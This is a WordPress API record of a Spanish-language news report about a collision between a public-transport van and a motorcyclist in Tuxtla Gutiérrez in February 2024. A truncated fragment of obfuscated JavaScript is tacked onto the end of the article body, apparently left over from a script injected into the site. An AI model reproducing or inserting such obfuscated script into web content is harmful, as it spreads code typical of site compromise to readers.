{"id":14184,"date":"2024-02-15T23:41:19","date_gmt":"2024-02-15T23:41:19","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14184"},"modified":"2024-02-15T23:41:20","modified_gmt":"2024-02-15T23:41:20","slug":"colectivero-y-motociclista-colisionan-en-el-barrio-san-francisco","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14184","title":{"rendered":"Colectivero y motociclista colisionan en el Barrio San Francisco"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708040296710-1024x768.jpg\" alt=\"\" class=\"wp-image-14185\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708040296710-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708040296710-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708040296710-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708040296710.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 15 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este jueves por la ma\u00f1ana se registr\u00f3 un accidente de tr\u00e1nsito entre una unidad de transporte p\u00fablico de la ruta 113 con n\u00famero econ\u00f3mico 12 y una motocicleta.<\/p>\n\n\n\n<p>Los reportes de tr\u00e1nsito informaron que, todo ocurri\u00f3 cuando el colectivo circulaba de Norte a Sur, sobre la 5a Poniente y al llegar a la 10a Avenida no respet\u00f3 la preferencia e hizo corte de circulaci\u00f3n.<\/p>\n\n\n\n<p>Luis Fernando &#8220;N&#8221;, tripulaba una Italika de color verde con negro en el sentido de Oriente a Poniente se impact\u00f3 de lleno contra la unidad.<\/p>\n\n\n\n<p>Por el golpe sali\u00f3 volando y se estrell\u00f3 contra el pavimento, el cual fue atendido param\u00e9dicos de Protecci\u00f3n Civil Municipal.<\/p>\n\n\n\n<p>En el lugar el responsable, se hizo cargo de los gastos generados mediante un seguro automotriz.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 15 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este jueves por la ma\u00f1ana se registr\u00f3 un accidente de tr\u00e1nsito entre una unidad de transporte p\u00fablico de la ruta 113 con n\u00famero econ\u00f3mico 12 y una motocicleta. Los reportes de tr\u00e1nsito informaron que, todo ocurri\u00f3 cuando el colectivo circulaba de Norte a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14185,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-14184","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14184","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14184"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14184\/revisions"}],"predecessor-version":[{"id":14186,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14184\/revisions\/14186"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14185"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14184"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14184"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14184"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}